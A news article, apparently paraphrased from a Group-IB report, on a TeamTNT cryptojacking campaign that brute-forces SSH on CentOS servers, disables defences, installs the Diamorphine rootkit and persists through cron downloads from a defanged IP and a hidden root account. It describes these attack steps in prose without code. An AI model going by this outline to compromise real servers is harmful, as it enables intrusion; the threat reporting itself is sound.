The Latest TeamTNT Cryptojacking Offensive Targets CentOS Servers with Rootkit
A fresh cybercrime endeavor by the moniker of TeamTNT has emerged targeting Virtual Private Server (VPS) infrastructures running on the CentOS operating system.
According to a report from Group-IB researchers Vito Alfano and Nam Le Phuong published on Wednesday, the initial breach was achieved via a Secure Shell (SSH) brute force assault on the victim’s resources, during which the malefactor uploaded a malevolent script.
The malevolent script, as highlighted by the Singaporean cybersecurity company, is responsible for deactivating security features, erasing logs, terminating digital currency mining processes, and obstructing recovery actions.
The sequence of attacks ultimately sets the stage for the introduction of the Diamorphine rootkit to mask malicious activities, while also creating constant remote access to the exploited host.
The activity has been linked to TeamTNT with a reasonable level of certainty, pointing to resemblances in the methods, tactics, and operations (MTOs) observed.
TeamTNT was first identified in 2019, engaging in unlawful digital currency mining operations by infiltrating cloud and containerized platforms. Despite bidding farewell in November 2021 with a claim of a “clean exit,” various incursions have been linked to the hacking gang since September 2022.
The recent activities associated with the group involve a shell script that initially performs a check to ascertain prior infections from different cryptojacking endeavors, followed by actions to compromise device security by deactivating SELinux, AppArmor, and the firewall.
 |
| Adaptations made to ssh service |
“The script looks for a cloud provider daemon called aliyun.service associated with Alibaba,” the researchers mentioned. “Upon detection, it proceeds to retrieve a bash script from update.aegis.aliyun.com to remove the aforesaid service.”
In addition to shutting down all rival digital currency mining operations, the script executes several commands aimed at eliminating any traces of other miners, stopping containerized processes, and deleting images linked to any coin miners.
Moreover, it ensures persistency by setting up cron jobs to download the shell script every half hour from a remote server (65.108.48[.]150) and tweaking the “/root/.ssh/authorized_keys” file to include a surreptitious account.
“It secures the system by altering file attributes, creating a covert user with root privileges, and erasing command history to conceal its undertakings,” the researchers pointed out. “The threat actor takes every precaution; indeed, the script enacts diverse modifications within the SSH and firewall service configurations.”
About Author
